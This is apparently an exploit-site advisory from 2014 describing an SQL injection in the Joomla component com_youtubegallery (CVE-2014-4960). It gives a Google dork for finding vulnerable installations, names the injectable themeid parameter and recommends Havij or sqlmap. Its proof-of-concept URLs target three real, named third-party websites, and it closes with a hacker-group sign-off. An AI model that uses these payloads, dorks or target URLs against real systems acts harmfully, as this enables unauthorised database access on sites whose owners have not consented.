facebook facebook twitter rss

Joomla component com_youtubegallery - SQL Injection

Author: bRpsd , Published: 27-08-2014
# Title:
Joomla component com_youtubegallery - SQL Injection


# Type ===> SQL Injection
# Skype ===> vegnox
# Google Dork ===> inurl:index.php?option=com_youtubegallery
# Software Link ===> http://www.joomlaboat.com/youtube-gallery
# Version ===> 4.x - 3.x
# Tested on ===> Joomla 4.1.7 on Joomla 1.5, 2.5, 3 , Windows7 , Havij
# CVE ===> CVE-2014-4960

Exploiting via Havij or sqlmap :
index.php?option=com_youtubegallery&view=youtubegallery&listid=1&themeid=1

Exploit Poc:
http://www.ultimatebikenite.com/index.php?option=com_youtubegallery&view=youtubegallery&listid=1&themeid=1'
http://www.eagleworldwide.com/index.php?option=com_youtubegallery&view=youtubegallery&listid=1&themeid=1'
http://rumfordgroup.com/index.php?option=com_youtubegallery&view=youtubegallery&listid=1&themeid=1%27


Exploit4arab
Hack4arab
Die4arab ;)
##bRpsd## ~!

Like us on Facebook :